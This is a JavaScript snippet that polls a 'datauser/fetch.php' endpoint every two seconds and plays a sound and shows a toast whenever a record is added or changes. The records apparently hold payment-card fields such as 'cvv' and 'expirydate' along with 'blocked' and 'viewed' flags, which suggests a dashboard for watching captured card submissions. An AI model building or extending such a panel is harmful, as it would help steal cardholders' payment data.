let oldData = []; // Initialize oldData as an empty array
    let isFirstCheck = true; // Flag to indicate if it's the first check
    const keysToSkip = ['last_activity', 'cvv', 'expirydate', 'input_array', 'status', 'blocked', 'viewed','qrcode'];

    // Function to fetch data from fetch_data.php
    async function fetchDataFromServer() {
        try {
            const response = await fetch('../../datauser/fetch.php');
            console.log("running")
            if (!response.ok) {
                throw new Error('Network response was not ok');
            }
            return await response.json();
        } catch (error) {
            console.error('Error fetching data:', error);
            return []; // Return an empty array in case of an error
        }
    }

    // Function to check for updates and play audio using Howler.js
    async function checkForUpdates() {
        const newData = await fetchDataFromServer();

        if (!isFirstCheck) { // Check if it's not the first check
            newData.forEach(newItem => {
                const oldItem = oldData.find(item => item.id === newItem.id);
                if (!oldItem || !compareObjects(newItem, oldItem)) {
                    const sound = new Howl({
                        src: ['audio.mp3']
                    });
                    sound.play();
                    showToast(`${newItem.id} updated`);
                }
            });
        }

        // Update oldData with newData
        oldData = newData;

        isFirstCheck = false; // Set isFirstCheck to false after the first check
    }

    // Function to compare objects while skipping certain keys
    function compareObjects(obj1, obj2) {
        for (let key in obj1) {
            if (!keysToSkip.includes(key) && JSON.stringify(obj1[key]) !== JSON.stringify(obj2[key])) {
                return false;
            }
        }
        return true;
    }

    // Function to show a toast
    function showToast(message) {
        Toastify({
            text: message,
            duration: 5000,
            close: true,
            gravity: 'top', // 'top' or 'bottom'
            position: 'left', // 'left', 'center' or 'right'
            backgroundColor: 'linear-gradient(to right, #00b09b, #96c93d)',
        }).showToast();
    }

    // Interval to check for updates every 2 seconds
    setInterval(checkForUpdates, 2000);

    // Initial call to check for updates after 2 seconds to avoid checking during page load
    setTimeout(checkForUpdates, 2000);